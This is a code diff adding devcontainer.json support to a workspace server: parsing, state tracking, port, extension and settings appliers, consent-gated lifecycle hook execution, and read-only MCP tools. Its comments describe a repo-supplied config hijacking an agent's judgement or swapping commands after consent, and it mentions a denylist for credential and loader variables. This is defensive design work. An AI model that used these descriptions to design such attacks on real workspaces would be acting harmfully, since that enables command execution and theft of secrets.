+        'lifecycle': {h: [] for h in HOOKS}, 'hook_hashes': {},
+        'ports': [], 'ports_skipped': [],
+        'extensions': [], 'extensions_rejected': [],
+        'settings': {}, 'settings_denied': [],
+        'env': {}, 'env_denied': [],
+        'unsupported': [], 'caveats': [], 'needs_root': False,
+    }
+    path = find_config(workdir)
+    if not path:
+        return rec
+    rec['found'] = True
+    rec['path'] = path
+    rec['rel_path'] = os.path.relpath(path, workdir)
+    try:
+        raw = read_raw(path)
+    except DevcontainerError as e:
+        rec['error'] = e.message
+        return rec
+    rec['config_hash'] = content_hash(raw)
+    try:
+        cfg = loads_jsonc(raw)
+    except DevcontainerError as e:
+        rec['error'] = e.message
+        rec['error_line'] = e.line
+        rec['error_column'] = e.column
+        return rec
+
+    name = cfg.get('name')
+    rec['name'] = name.strip()[:120] if isinstance(name, str) else ''
+
+    folder, folder_caveat = map_workspace_folder(workdir, cfg.get('workspaceFolder'))
+    rec['workspace_folder'] = folder
+    if folder_caveat:
+        rec['caveats'].append(folder_caveat)
+
+    extra_unsupported: List[Dict[str, str]] = []
+    for hook in HOOKS:
+        try:
+            cmds = normalize_commands(cfg.get(HOOK_KEYS[hook]), folder)
+        except DevcontainerError as e:
+            cmds = []
+            extra_unsupported.append({
+                'key': HOOK_KEYS[hook], 'severity': 'blocking', 'detail': '',
+                'reason': e.message,
+                'remedy': 'Use a string, an array of arguments, or an object '
+                          'of named commands.'})
+        rec['lifecycle'][hook] = cmds
+        rec['hook_hashes'][hook] = hook_hash(cmds)
+        for c in cmds:
+            for cav in c.get('caveats') or []:
+                if cav.startswith('unresolved variables'):
+                    rec['caveats'].append(f'{HOOK_KEYS[hook]}: {cav}')
+            if c.get('needs_root'):
+                rec['needs_root'] = True
+
+    rec['ports'], rec['ports_skipped'] = normalize_ports(
+        cfg.get('forwardPorts'), cfg.get('portsAttributes'))
+
+    vscode = ((cfg.get('customizations') or {}).get('vscode')
+              if isinstance(cfg.get('customizations'), dict) else None)
+    vscode = vscode if isinstance(vscode, dict) else {}
+    rec['extensions'], rec['extensions_rejected'] = \
+        normalize_extensions(vscode.get('extensions'))
+    rec['settings'], rec['settings_denied'] = \
+        normalize_settings(vscode.get('settings'))
+
+    merged_env: Dict[str, Any] = {}
+    for key in ('containerEnv', 'remoteEnv'):
+        if isinstance(cfg.get(key), dict):
+            merged_env.update(cfg[key])
+    rec['env'], rec['env_denied'] = normalize_env(merged_env, folder)
+
+    if rec['needs_root']:
+        extra_unsupported.append({
+            'key': 'lifecycle commands needing root', 'severity': 'partial',
+            'detail': '', 'reason': _POD_ROOT_REASON,
+            'remedy': 'Install into $HOME (nvm, pyenv, rustup, pip --user) or '
+                      'bake the package into the workspace image.'})
+    rec['unsupported'] = classify_unsupported(cfg, extra_unsupported)
+    return rec
+
+
+def summarize(workdir: str) -> Dict[str, Any]:
+    """Counts-only view for the project brief — same read, smaller payload."""
+    rec = parse(workdir)
+    if not rec['found']:
+        return {'found': False}
+    if rec['error']:
+        return {'found': True, 'path': rec['rel_path'], 'error': rec['error']}
+    blocking = sum(1 for u in rec['unsupported'] if u['severity'] == 'blocking')
+    return {
+        'found': True,
+        'path': rec['rel_path'],
+        'name': rec['name'],
+        'config_hash': rec['config_hash'],
+        'ports': len(rec['ports']),
+        'extensions': len(rec['extensions']),
+        'settings': len(rec['settings']),
+        'env': len(rec['env']),
+        'hooks': {h: len(rec['lifecycle'][h]) for h in HOOKS
+                  if rec['lifecycle'][h]},
+        'unsupported': len(rec['unsupported']),
+        'blocking': blocking,
+        'blocking_keys': [u['key'] for u in rec['unsupported']
+                          if u['severity'] == 'blocking'],
+        'needs_root': rec['needs_root'],
+    }
+
+
+# ── state ────────────────────────────────────────────────────────────────────
+#
+# Only what we DID is stored — everything parsed is read-through. One file,
+# keyed by workdir rather than project id: a project has N workdirs and a git
+# worktree carries its own devcontainer, and slugifying absolute paths into
+# per-project filenames would be a needless traversal surface.
+
+STATE_DIR = '/home/dev/.claude-devcontainer'
+STATE_VERSION = 1
+BOOT_MARKER = '/tmp/.kc-devcontainer-boot'
+
+
+def state_path() -> str:
+    return os.path.join(STATE_DIR, 'state.json')
+
+
+def log_dir() -> str:
+    return os.path.join(STATE_DIR, 'logs')
+
+
+def log_path_for(workdir: str, hook: str, when: Optional[float] = None) -> str:
+    slug = re.sub(r'[^A-Za-z0-9]+', '-', workdir).strip('-')[:80] or 'workspace'
+    ts = int(when if when is not None else time.time())
+    return os.path.join(log_dir(), f'{slug}.{hook}.{ts}.log')
+
+
+def ensure_dirs() -> None:
+    os.makedirs(STATE_DIR, mode=0o700, exist_ok=True)
+    os.makedirs(log_dir(), mode=0o700, exist_ok=True)
+
+
+def read_state() -> Dict[str, Any]:
+    try:
+        with open(state_path(), 'r', encoding='utf-8') as f:
+            data = json.load(f)
+    except (OSError, ValueError):
+        return {'version': STATE_VERSION, 'workdirs': {}}
+    if not isinstance(data, dict) or not isinstance(data.get('workdirs'), dict):
+        return {'version': STATE_VERSION, 'workdirs': {}}
+    data.setdefault('version', STATE_VERSION)
+    return data
+
+
+def write_state(state: Dict[str, Any]) -> None:
+    """Atomic tmp+replace at 0600 — a torn state file would make us re-run a
+    hook that already succeeded, or skip one that never did."""
+    ensure_dirs()
+    path = state_path()
+    tmp = f'{path}.tmp.{os.getpid()}'
+    with open(tmp, 'w', encoding='utf-8') as f:
+        json.dump(state, f, indent=2, sort_keys=True)
+    os.chmod(tmp, stat.S_IRUSR | stat.S_IWUSR)
+    os.replace(tmp, path)
+
+
+# One state file holds every workdir, so read-modify-write has to be serialized:
+# the boot pass starts one thread per opted-in workdir, and two of them landing
+# their hook results at the same time would silently drop one record. The lock
+# is here rather than in DevcontainerManager because get/put are also called
+# from request handlers, which are ThreadingHTTPServer workers.
+_STATE_LOCK = threading.Lock()
+
+
+def get_record(workdir: str) -> Dict[str, Any]:
+    return (read_state().get('workdirs') or {}).get(workdir) or {}
+
+
+def put_record(workdir: str, record: Dict[str, Any]) -> None:
+    with _STATE_LOCK:
+        state = read_state()
+        state.setdefault('workdirs', {})[workdir] = record
+        write_state(state)
+
+
+def drop_record(workdir: str) -> bool:
+    with _STATE_LOCK:
+        state = read_state()
+        if workdir in (state.get('workdirs') or {}):
+            del state['workdirs'][workdir]
+            write_state(state)
+            return True
+    return False
+
+
+def boot_id() -> str:
+    """Identity of the current pod boot, used to re-run postStart once per start.
+
+    Read-or-create a random token under /tmp. /tmp is container-local and wiped
+    on restart, so it IS a per-boot identity by construction. Deliberately not
+    /proc/sys/kernel/random/boot_id — that is the NODE's boot id: it survives a
+    pod restart on the same node, which would silently make postStart never
+    run again.
+    """
+    try:
+        with open(BOOT_MARKER, 'r', encoding='utf-8') as f:
+            token = f.read().strip()
+        if token:
+            return token
+    except OSError:
+        pass
+    token = secrets.token_hex(8)
+    try:
+        with open(BOOT_MARKER, 'w', encoding='utf-8') as f:
+            f.write(token)
+    except OSError:
+        # Unwritable /tmp: return a per-call token so postStart is treated as
+        # pending rather than silently "done".
+        return token
+    return token
+
+
+def lifecycle_status(parsed: Dict[str, Any],
+                     record: Optional[Dict[str, Any]] = None,
+                     current_boot: Optional[str] = None) -> Dict[str, Any]:
+    """Per-hook state: none | pending | done | stale | failed | running.
+
+    Invalidation is by CONTENT HASH, never mtime: `git checkout` and a PVC
+    restore both bump mtime with identical content, and a rebase can move it
+    backwards.
+    """
+    record = record or {}
+    ran = record.get('lifecycle') or {}
+    boot = current_boot if current_boot is not None else boot_id()
+    out: Dict[str, Any] = {}
+    for hook in HOOKS:
+        cmds = (parsed.get('lifecycle') or {}).get(hook) or []
+        entry: Dict[str, Any] = {'count': len(cmds)}
+        if not cmds:
+            entry['status'] = 'none'
+            out[hook] = entry
+            continue
+        want = (parsed.get('hook_hashes') or {}).get(hook) or hook_hash(cmds)
+        prev = ran.get(hook) or {}
+        entry['ran_at'] = prev.get('ran_at')
+        entry['exit_code'] = prev.get('exit_code')
+        entry['log_tail'] = prev.get('log_tail', '')
+        entry['log_path'] = prev.get('log_path', '')
+        if not prev:
+            entry['status'] = 'pending'
+        elif prev.get('status') == 'running':
+            entry['status'] = 'running'
+        elif prev.get('hook_hash') != want:
+            entry['status'] = 'stale'
+        elif prev.get('status') in ('failed', 'timed_out'):
+            entry['status'] = prev['status']
+        elif hook == 'postStart' and prev.get('boot_id') != boot:
+            # New pod boot: postStart is per-start by definition.
+            entry['status'] = 'pending'
+        else:
+            entry['status'] = 'done'
+        out[hook] = entry
+    return out

--- a/charts/workspace/mcp_dashboard.py
+++ b/charts/workspace/mcp_dashboard.py
@@ -254,6 +254,61 @@ def _t_list_triggers(a):
     return _ok(_pretty({'webhooks': webhooks, 'crons': crons}))
 
 
+# ── devcontainer.json (#594) ───────────────────────────────────────────────
+# READ ONLY, deliberately. /api/devcontainer/apply is the one route in the
+# whole server that can execute a command out of a cloned repo, and the
+# consent it requires is a human reading the verbatim command text in a
+# dialog. Exposing it as an MCP tool would hand that consent to an agent —
+# and the agent's judgement is exactly what a malicious devcontainer.json is
+# trying to capture. The tools below let the CTO SEE and EXPLAIN a repo's
+# environment; a human still clicks Apply.
+
+def _t_list_devcontainers(a):
+    return _call('GET', '/api/devcontainer/scan')
+
+
+def _t_get_devcontainer(a):
+    workdir = (a.get('workdir') or '').strip()
+    if not workdir:
+        return _err('workdir is required (absolute path under /home/dev)')
+    status, payload = _api(
+        'GET', '/api/devcontainer?workdir=' + urllib.parse.quote(workdir))
+    if status == 404:
+        return _err('devcontainer support is disabled on this workspace')
+    if status != 200 or not isinstance(payload, dict):
+        detail = payload.get('error') if isinstance(payload, dict) else payload
+        return _err(f'dashboard API GET /api/devcontainer returned HTTP '
+                    f'{status}: {detail}')
+    if not payload.get('found'):
+        return _ok(_pretty({'workdir': workdir, 'found': False}))
+    if payload.get('error'):
+        return _ok(_pretty({'workdir': workdir, 'found': True,
+                            'error': payload['error']}))
+    # Trim to what the model reasons over. The full record carries per-command
+    # objects and rejection lists that are useful in the UI and just token
+    # weight here.
+    return _ok(_pretty({
+        'workdir': workdir,
+        'path': payload.get('rel_path'),
+        'name': payload.get('name'),
+        'ports': payload.get('ports'),
+        'extensions': payload.get('extensions'),
+        'env': sorted((payload.get('env') or {}).keys()),
+        'commands': {hook: [c.get('display') for c in cmds]
+                     for hook, cmds in (payload.get('lifecycle') or {}).items()
+                     if cmds},
+        'status': {hook: entry.get('status') for hook, entry
+                   in (payload.get('lifecycle_status') or {}).items()
+                   if entry.get('status') != 'none'},
+        'needs_root': payload.get('needs_root'),
+        'not_applicable_here': [
+            {'key': u.get('key'), 'severity': u.get('severity'),
+             'reason': u.get('reason'), 'remedy': u.get('remedy')}
+            for u in (payload.get('unsupported') or [])],
+        'caveats': payload.get('caveats'),
+    }))
+
+
 # ── AI CTO project tools (#465) ────────────────────────────────────────────
 
 def _project_id_env() -> str:
@@ -672,6 +727,27 @@ TOOLS: Dict[str, Any] = {
         'list_triggers',
         'List configured webhooks and cron schedules (the Triggers tab).',
         _t_list_triggers),
+
+    # ── devcontainer.json (#594) — read only; see the note above the handlers
+    'list_devcontainers': _tool(
+        'list_devcontainers',
+        'List workspace directories that carry a devcontainer.json, with a '
+        'count of what each declares and how many properties cannot be applied '
+        'in this pod.', _t_list_devcontainers),
+    'get_devcontainer': _tool(
+        'get_devcontainer',
+        "Read one directory's devcontainer.json: declared ports, extensions, "
+        'environment, lifecycle commands, what has already run, and — '
+        'importantly — `not_applicable_here`, the properties this workspace '
+        'cannot honour (features/image/build need root or a Docker daemon) '
+        'with the reason and a remedy. Use it to explain to the user why their '
+        'environment is or is not set up. You CANNOT apply it: running commands '
+        'from a repo needs a human to read them and click Apply.',
+        _t_get_devcontainer,
+        properties={'workdir': {
+            'type': 'string',
+            'description': 'Absolute path under /home/dev.'}},
+        required=['workdir']),
 
     # ── AI CTO projects (#465) ──────────────────────────────────────────────
     'list_projects': _tool(

--- a/charts/workspace/server.py
+++ b/charts/workspace/server.py
@@ -24,6 +24,7 @@ import http.client
 import socket
 import ipaddress
 import fcntl
+import signal
 import zipfile
 
 # Hidden-text detection for agent-readable instruction files (#559). Pure and
@@ -35,6 +36,17 @@ try:
 except ImportError:      # pragma: no cover - module always ships beside server.py
     instruction_scan = None
     _INSTRUCTION_SCAN_AVAILABLE = False
+
+# devcontainer.json reader (#594). Pure — it parses, normalizes and classifies
+# but never executes; DevcontainerManager below owns everything that touches
+# the workspace. Kept out of server.py because the JSONC parser wants ~40 unit
+# tests that must not boot an HTTP server, same precedent as instruction_scan.
+try:
+    import devcontainer
+    _DEVCONTAINER_AVAILABLE = True
+except ImportError:      # pragma: no cover - module always ships beside server.py
+    devcontainer = None
+    _DEVCONTAINER_AVAILABLE = False
 
 # Persistent memory subsystem — shared with mcp_memory.py via the colocated
 # `memory` package. Importable because the workspace-entrypoint copies the
@@ -2350,6 +2362,22 @@ class ClaudeTaskManager:
         # set in Settings (no redeploy) reaches the CLI subprocess. Store wins
         # over the pod env; when unset the pod/helm default carries through.
         provider_env = []
+        # containerEnv/remoteEnv from an APPLIED devcontainer.json (#594), so a
+        # repo's NODE_ENV reaches the agent that works in it. Precedence is
+        # pod < devcontainer < provider keys < effort, enforced here by
+        # DROPPING any devcontainer key that a later layer also sets rather
+        # than by relying on tmux `-e` ordering. devcontainer.py already refuses
+        # ANTHROPIC_*/GH_*/PATH/LD_* outright; this is the second line, so that
+        # even a denylist gap cannot let a repo win over a real provider key.
+        _dc_env = {}
+        if _DEVCONTAINER_AVAILABLE:
+            _dc_env = DevcontainerManager.env_for_workdir(workdir)
+        _later_keys = set(ProviderKeysManager.env_overlay().keys()) | \
+            set(ClaudeTaskManager.effort_env(assistant, effort).keys())
+        for k, v in _dc_env.items():
+            if k in _later_keys:
+                continue
+            provider_env += ['-e', f'{k}={v}']
         for k, v in ProviderKeysManager.env_overlay().items():
             provider_env += ['-e', f'{k}={v}']
         # Reasoning effort for the CLIs that read it from the environment (#362) —
@@ -3692,9 +3720,17 @@ class WorkspaceManager:
     .claude-tasks, etc.) and obvious non-projects (node_modules, vendor)."""
 
     HOME_DIR = '/home/dev'
+    # NOT cosmetic: this tuple feeds ProjectsManager.discover()'s auto-provision
+    # as well as the new-task picker, so adding an entry makes previously
+    # invisible directories register themselves. The devcontainer entries are
+    # deliberate (#594) — a devcontainer.json is an explicit human declaration
+    # that a directory is a project, which is stronger evidence than a stray
+    # Makefile. The slash-bearing entry works because the check below is
+    # os.path.exists(os.path.join(path, m)), not a listdir membership test.
     PROJECT_MARKERS = (
         'package.json', 'pyproject.toml', 'Cargo.toml',
         'go.mod', 'Gemfile', 'Makefile', 'requirements.txt',
+        os.path.join('.devcontainer', 'devcontainer.json'), '.devcontainer.json',
     )
     SKIP_NAMES = {'node_modules', 'vendor', 'target', 'dist', 'build', '__pycache__'}
 
@@ -3722,11 +3758,16 @@ class WorkspaceManager:
                 os.path.exists(os.path.join(path, m))
                 for m in WorkspaceManager.PROJECT_MARKERS
             )
+            has_devcontainer = (
+                os.path.exists(os.path.join(path, '.devcontainer',
+                                            'devcontainer.json'))
+                or os.path.exists(os.path.join(path, '.devcontainer.json')))
             results.append({
                 'path': path,
                 'label': name,
                 'is_git_repo': is_git,
                 'is_project': is_git or has_project_marker,
+                'has_devcontainer': has_devcontainer,
                 'mtime': mtime,
             })
         results.sort(key=lambda d: d['mtime'], reverse=True)
@@ -4288,7 +4329,8 @@ class ProjectsManager:
                 c = {
                     'id': pid, 'name': name or pid, 'workdirs': [], 'repo': '',
                     'memory_namespace': f'project.{pid}', 'reasons': [],
-                    'has_git_remote': False, 'has_task': False, 'has_memory': False,
+                    'has_git_remote': False, 'has_task': False,
+                    'has_memory': False, 'has_devcontainer': False,
                 }
                 candidates[pid] = c
             return c
@@ -4304,6 +4346,18 @@ class ProjectsManager:
             if d['path'] not in c['workdirs']:
                 c['workdirs'].append(d['path'])
             c['reasons'].append('workspace-dir')
+            if d.get('has_devcontainer'):
+                # A devcontainer.json is a human saying "this is a project" in
+                # so many words (#594) — stronger than a marker file, so it
+                # counts toward `high` confidence. Its `name`, when set, also
+                # beats the bare directory label for a candidate nobody has
+                # named yet; a user-chosen name is never overwritten because
+                # discover() only ever *creates* records.
+                c['has_devcontainer'] = True
+                c['reasons'].append('devcontainer')
+                dc_name = ProjectsManager._devcontainer_name(d['path'])
+                if dc_name and c['name'] == d['label']:
+                    c['name'] = dc_name
             if d.get('is_git_repo'):
                 remote = ProjectsManager._git_remote(d['path'])
                 if remote:
@@ -4341,7 +4395,8 @@ class ProjectsManager:
                 if c['workdirs']:
                     c['reasons'].append('implied-workdir')
             c['confidence'] = 'high' if (
-                c['has_git_remote'] or c['has_task'] or c['has_memory']) else 'low'
+                c['has_git_remote'] or c['has_task'] or c['has_memory']
+                or c.get('has_devcontainer')) else 'low'
             c['registered'] = c['id'] in existing_ids
             c['reasons'] = sorted(set(c['reasons']))
             if auto_provision and c['confidence'] == 'high' and not c['registered']:
@@ -4367,6 +4422,37 @@ class ProjectsManager:
             'registered': registered,
             'backfilled': backfilled,
         }
+
+    @staticmethod
+    def _devcontainer_name(workdir):
+        """`name` from a devcontainer.json, '' for anything else. Best-effort:
+        discovery must never fail because a repo shipped broken JSON."""
+        if not _DEVCONTAINER_AVAILABLE:
+            return ''
+        try:
+            summary = devcontainer.summarize(workdir)
+        except Exception:
+            return ''
+        return summary.get('name') or '' if summary.get('found') else ''
+
+    @staticmethod
+    def _devcontainer_brief(workdirs):
+        """Read-through devcontainer summary per workdir, same discipline as the
+        `git` field: pure file reads, no subprocess, nothing cached. Wrapped so
+        an unparseable file yields an `error` row instead of breaking the whole
+        brief."""
+        if not _DEVCONTAINER_AVAILABLE:
+            return []
+        out = []
+        for wd in workdirs:
+            try:
+                summary = devcontainer.summarize(wd)
+            except Exception as e:
+                summary = {'found': True, 'error': str(e)[:200]}
+            if summary.get('found'):
+                summary['workdir'] = wd
+                out.append(summary)
+        return out
 
     # ── brief aggregation (the heart of the feature) ─────────────────────
 
@@ -4468,6 +4554,7 @@ class ProjectsManager:
             'decisions': decisions_all[:ProjectsManager._BRIEF_DECISIONS],
             'memories': others_all[:ProjectsManager._BRIEF_MEMORIES],
             'git': git,
+            'devcontainer': ProjectsManager._devcontainer_brief(workdirs),
             'triggers': ProjectsManager._project_triggers(workdirs),
             'counts': {'goals': len(goals_all), 'decisions': len(decisions_all),
                        'memories': len(others_all), 'tasks': len(proj_tasks)},
@@ -4529,6 +4616,34 @@ class ProjectsManager:
             L.append("## Triggers")
             for tr in brief['triggers']:
                 L.append(f"- {tr['kind']}: {tr.get('id')}")
+
+        # Dev container LAST and capped at 3 workdirs (#594). _BRIEF_MARKDOWN_CAP
+        # truncates from the END, so anything appended here is what gets cut
+        # first — which is the correct order of sacrifice: losing the goals or
+        # the decision log to make room for a port list would be a regression.
+        if brief.get('devcontainer'):
+            L.append("")
+            L.append("## Dev container")
+            for d in brief['devcontainer'][:3]:
+                if d.get('error'):
+                    L.append(f"- `{d.get('workdir')}` — unreadable: "
+                             f"{ProjectsManager._one_line(d['error'], 100)}")
+                    continue
+                bits = []
+                if d.get('ports'):
+                    bits.append(f"{d['ports']} ports")
+                if d.get('extensions'):
+                    bits.append(f"{d['extensions']} extensions")
+                hooks = ', '.join(sorted((d.get('hooks') or {}).keys()))
+                if hooks:
+                    bits.append(hooks)
+                label = d.get('name') or d.get('path') or 'devcontainer.json'
+                L.append(f"- {label}" + (f" — {' · '.join(bits)}" if bits else ""))
+                if d.get('blocking'):
+                    L.append(f"  - ⚠ cannot be applied here: "
+                             f"{', '.join(d.get('blocking_keys') or [])}")
+            if len(brief['devcontainer']) > 3:
+                L.append(f"- _(+{len(brief['devcontainer']) - 3} more)_")
 
         md = '\n'.join(L)
         if len(md) > ProjectsManager._BRIEF_MARKDOWN_CAP:
@@ -7046,6 +7161,652 @@ class AppsManager:
         return True, ''
 
 
+class DevcontainerManager:
+    """The impure half of devcontainer.json support (#594).
+
+    devcontainer.py locates, parses, normalizes and classifies — and imports no
+    subprocess. Everything that TOUCHES the workspace lives here, because it
+    needs AppsManager, EventBroker and READONLY_MODE, and a pure module that
+    imported `server` for them would be a cycle. Same split as skills
+    (pure model + impure syncer).
+
+    THE SAFETY CONTRACT, in one table, because it is the whole feature:
+
+        discover() / brief() / any GET       never executes anything
+        POST /apply with hooks: []           appliers only, no execution
+        POST /apply with hooks               executes, and only after the
+                                             caller echoes back the config
+                                             hash it was shown
+        boot pass                            postStart only, and only with a
+                                             per-workdir opt-in AND an
+                                             unchanged hash AND the chart flag
+
+    The hash echo is a compare-and-swap, not decoration. Without it, a
+    `git pull` between the confirm dialog rendering the command text and the
+    user clicking OK means they authorized command A and command B ran. A
+    `postStartCommand` that rewrites its own devcontainer.json is the same
+    attack from inside.
+
+    Boot never runs postCreate even when it is pending: a ten-minute `npm ci`
+    would delay every pod start, and a user restarting to escape a broken
+    state would re-trigger exactly what broke it.
+    """
+
+    ENABLED = os.environ.get('DEVCONTAINER_ENABLED', 'true').lower() == 'true'
+    AUTO_APPLY = os.environ.get('DEVCONTAINER_AUTO_APPLY', 'true').lower() == 'true'
+    try:
+        TIMEOUT = max(30, int(os.environ.get('DEVCONTAINER_TIMEOUT', '900')))
+    except (TypeError, ValueError):
+        TIMEOUT = 900
+
+    HOME_DEV = '/home/dev'
+    # Lifecycle commands run with HOME=/home/dev, NOT the /home/ubuntu that
+    # interactive shells use (start.sh). server.py's own HOME is already
+    # /home/dev (devlaptop/Dockerfile sets USER dev / WORKDIR /home/dev and the
+    # deployment never overrides it), so this is belt-and-braces — but it is
+    # what makes `nvm`/`pip --user` land on the PVC and survive a restart.
+    HOOK_HOME = '/home/dev'
+    CODE_SERVER_USER_DIR = '/home/dev/.local/share/code-server/User'
+    CODE_SERVER_DATA_DIR = '/home/dev/.local/share/code-server'
+    CODE_SERVER_EXT_DIR = '/home/dev/.local/share/code-server/extensions'
+    SETTINGS_PATH = os.path.join(CODE_SERVER_USER_DIR, 'settings.json')
+    EXTENSION_TIMEOUT = 180
+    LOG_CAP_BYTES = 1024 * 1024
+    LOG_TAIL_BYTES = 8192
+    POLL_SECONDS = 0.25
+
+    # One run per workdir. A second POST while a hook is running gets 409
+    # rather than a second `npm ci` racing the first over node_modules.
+    _lock = threading.Lock()
+    _running = {}
+
+    # ── availability / validation ────────────────────────────────────────
+
+    @classmethod
+    def available(cls):
+        """Gated on its own flag, NOT on cto_available(). Reading the file a
+        repo already carries is a workspace capability; the CTO gate is about
+        the /cto page and a deployment can reasonably have one without the
+        other."""
+        return bool(cls.ENABLED and _DEVCONTAINER_AVAILABLE)
+
+    @classmethod
+    def resolve_workdir(cls, raw):
+        """(abs_path, error). Confined to /home/dev — realpath-compared with a
+        separator on the prefix, so neither `/home/dev/../etc` nor a lookalike
+        sibling like `/home/devious` passes. Same idiom as
+        _resolve_under_home_dev."""
+        if not raw or not isinstance(raw, str):
+            return '', 'workdir is required'
+        confine = os.path.realpath(cls.HOME_DEV)
+        path = os.path.realpath(raw)
+        if path != confine and not path.startswith(confine + os.sep):
+            return '', f'workdir must be under {confine}'
+        if not os.path.isdir(path):
+            return '', 'workdir is not a directory'
+        return path, ''
+
+    # ── read side ────────────────────────────────────────────────────────
+
+    @classmethod
+    def describe(cls, workdir):
+        """Everything the UI needs for one workdir: the parsed file, what we
+        have already done, and the derived per-hook status."""
+        parsed = devcontainer.parse(workdir)
+        record = devcontainer.get_record(workdir)
+        out = dict(parsed)
+        out['applied'] = {
+            'ports_pinned': record.get('ports_pinned') or [],
+            'extensions_installed': record.get('extensions_installed') or [],
+            'settings_written': record.get('settings_written') or {},
+            'env': record.get('env') or {},
+            'applied_at': record.get('applied_at'),
+            'auto_apply': bool(record.get('auto_apply')),
+            'consented_hash': record.get('consented_hash', ''),
+        }
+        out['lifecycle_status'] = devcontainer.lifecycle_status(parsed, record) \
+            if not parsed.get('error') else {}
+        out['busy'] = workdir in cls._running
+        return out
+
+    @classmethod
+    def scan(cls):
+        """One pass over the workspace dirs, so the SPA never fans out N
+        requests to find out which projects even have a devcontainer."""
+        out = []
+        for d in WorkspaceManager.list_dirs():
+            try:
+                summary = devcontainer.summarize(d['path'])
+            except Exception:          # a bad file must not break the list
+                continue
+            if not summary.get('found'):
+                continue
+            summary['workdir'] = d['path']
+            summary['label'] = d['label']
+            out.append(summary)
+        return out
+
+    # ── appliers (no execution) ──────────────────────────────────────────
+
+    @classmethod
+    def apply_ports(cls, parsed, record):
+        """Pin declared ports on the Applications page.
+
+        AppsManager already merges discovered LISTENs with declared pins, which
+        is exactly forwardPorts semantics — a port stays listed with its label
+        whether or not the process happens to be up.
+
+        Never clobbers: a port the user already named by hand keeps that name
+        and is reported as a conflict. Two repos both forwarding 3000 is the
+        common case and the second one silently renaming the first would be a
+        bug you would never trace back to here.
+        """
+        pinned, conflicts = [], []
+        already = set(record.get('ports_pinned') or [])
+        for entry in parsed.get('ports') or []:
+            port, label = entry['port'], entry['label']
+            existing = AppsManager.get_pin(port)
+            if existing and port not in already:
+                conflicts.append({
+                    'port': port, 'label': label,
+                    'existing': existing.get('name', ''),
+                    'reason': 'already pinned under another name — left alone'})
+                continue
+            try:
+                AppsManager.add_pin(port, label)
+                pinned.append(port)
+            except ValueError as e:
+                conflicts.append({'port': port, 'label': label,
+                                  'existing': '', 'reason': str(e)})
+        return pinned, conflicts
+
+    @classmethod
+    def _read_settings(cls):
+        try:
+            with open(cls.SETTINGS_PATH, 'r', encoding='utf-8') as f:
+                data = json.load(f)
+            return data if isinstance(data, dict) else {}
+        except (OSError, ValueError):
+            return {}
+
+    @classmethod
+    def apply_settings(cls, parsed, record):
+        """Merge customizations.vscode.settings into code-server's settings.json.
+
+        NEVER CLOBBERS A HAND EDIT. A key is written only when it is absent, or
+        when its current value is exactly what we last wrote for it. start.sh
+        seeds this file on first run only, and users edit it — silently
+        reverting someone's editor preference because a repo disagreed is the
+        kind of bug that gets a feature switched off.
+        """
+        want = parsed.get('settings') or {}
+        if not want:
+            return {}, []
+        previous = record.get('settings_written') or {}
+        current = cls._read_settings()
+        written, skipped = {}, []
+        merged = dict(current)
+        for key, value in want.items():
+            if key in current and current[key] != previous.get(key, object()):
+                skipped.append({'key': key,
+                                'reason': 'edited in the workspace — left alone'})
+                continue
+            if current.get(key, object()) == value:
+                written[key] = value      # already correct; still record it
+                continue
+            merged[key] = value
+            written[key] = value
+        if not written:
+            return {}, skipped
+        os.makedirs(cls.CODE_SERVER_USER_DIR, exist_ok=True)
+        tmp = f'{cls.SETTINGS_PATH}.tmp.{os.getpid()}'
+        with open(tmp, 'w', encoding='utf-8') as f:
+            json.dump(merged, f, indent=2, sort_keys=True)
+        os.replace(tmp, cls.SETTINGS_PATH)
+        return written, skipped
+
+    @classmethod
+    def _installed_extensions(cls):
+        try:
+            names = os.listdir(cls.CODE_SERVER_EXT_DIR)
+        except OSError:
+            return set()
+        out = set()
+        for n in names:
+            # Directories are `<publisher>.<name>-<version>`; strip the version.
+            out.add(re.sub(r'-\d[\w.\-]*$', '', n).lower())
+        return out
+
+    @classmethod
+    def apply_extensions(cls, parsed, record):
+        """Install declared extensions into the PVC-backed extensions dir.
+
+        argv list, shell=False, always. code-server's --install-extension also
+        accepts a FILESYSTEM PATH, so a shell string built from a repo-supplied
+        value is arbitrary editor code execution out of the cloned tree. The id
+        regex in devcontainer.py is the first guard; this is the second.
+
+        One failure does not abort the rest — a marketplace hiccup on extension
+        three should not lose extensions four and five.
+        """
+        want = parsed.get('extensions') or []
+        if not want:
+            return [], []
+        installed_now = cls._installed_extensions()
+        done = list(record.get('extensions_installed') or [])
+        installed, failed = [], []
+        for ext in want:
+            base = ext.split('@', 1)[0].lower()
+            if base in installed_now or ext in done:
+                installed.append(ext)
+                continue
+            argv = ['code-server', '--install-extension', ext,
+                    '--extensions-dir', cls.CODE_SERVER_EXT_DIR,
+                    '--user-data-dir', cls.CODE_SERVER_DATA_DIR]
+            try:
+                proc = subprocess.run(argv, capture_output=True, text=True,
+                                      timeout=cls.EXTENSION_TIMEOUT)
+            except (OSError, subprocess.SubprocessError) as e:
+                failed.append({'id': ext, 'reason': str(e)[:200]})
+                continue
+            if proc.returncode == 0:
+                installed.append(ext)
+            else:
+                failed.append({
+                    'id': ext,
+                    'reason': (proc.stderr or proc.stdout or
+                               f'exit {proc.returncode}').strip()[:200]})
+        return installed, failed
+
+    @classmethod
+    def env_for_workdir(cls, workdir):
+        """containerEnv/remoteEnv for a task launched in this workdir.
+
+        Read-through from the file — not from state — so removing a variable
+        from devcontainer.json takes effect immediately rather than lingering
+        until someone re-applies. Returns {} for everything that is not an
+        applied devcontainer, and never raises: a task launch must not fail
+        because a repo shipped a broken JSON file.
+        """
+        if not cls.available():
+            return {}
+        try:
+            wd, err = cls.resolve_workdir(workdir)
+            if err:
+                return {}
+            record = devcontainer.get_record(wd)
+            if not record.get('applied_at'):
+                return {}
+            parsed = devcontainer.parse(wd)
+            if parsed.get('error'):
+                return {}
+            return dict(parsed.get('env') or {})
+        except Exception as e:
+            print(f'[devcontainer] env lookup failed for {workdir}: {e}',
+                  file=sys.stderr)
+            return {}
+
+    # ── lifecycle execution ──────────────────────────────────────────────
+
+    @classmethod
+    def _spawn(cls, entry, cwd, env, log_file):
+        """One command as its own process GROUP.
+
+        start_new_session=True is not a nicety: without it a runaway
+        `npm install` that spawns children outlives the SIGTERM we send on
+        timeout, and the workspace keeps burning CPU with nothing tracking it.
+
+        String -> ['bash', '-lc', s] per the spec. Array -> exec'd directly with
+        shell=False. The two are never mixed: concatenating an argv list into a
+        shell string would re-introduce quoting bugs the array form exists to
+        avoid.
+        """
+        if entry['kind'] == 'argv':
+            argv = list(entry['command'])
+        else:
